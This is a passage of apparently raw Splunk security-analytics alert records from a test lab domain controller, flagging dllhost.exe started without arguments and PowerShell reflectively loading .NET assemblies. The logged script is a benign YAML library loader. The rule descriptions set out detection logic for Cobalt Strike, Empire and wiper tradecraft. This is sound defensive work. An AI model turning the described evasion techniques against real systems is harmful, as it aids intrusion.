PowerShell script block." 1664960400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664960400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="5400", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664963732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T08:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T08:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664963732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T08:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T08:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664963732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T08:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T08:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664963732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T08:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T08:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664956800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664956800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="5772", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664960132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T07:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T07:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664960132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T07:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T07:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664960132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T07:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T07:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir 